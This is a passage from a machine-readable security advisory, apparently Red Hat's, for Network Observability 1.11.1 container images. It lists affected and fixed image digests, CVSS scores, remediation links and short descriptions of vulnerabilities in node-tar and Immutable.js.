"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "tar: node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation"
},
{
"cve": "CVE-2026-29063",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-03-06T19:00:57.982727+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445291"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this vulnerability requires that an attacker is able to provide arbitrary data to clients of this library in a way that calls the affected functions with data the attacker controls. In most deployments, the ability to provide data in this fashion requires that an attacker has some degree of privileges to access the affected applications.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-29063"
},
{
"category": "external",
"summary": "RHBZ#2445291",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445291"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-29063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw",
"url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
}
],
"release_date": "2026-03-06T18:25:22.438000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution"
},
{
"cve": "CVE-2026-33186",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-03-20T23:02:27.802640+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449833"
}
],
"notes": [
{
"category": "description",
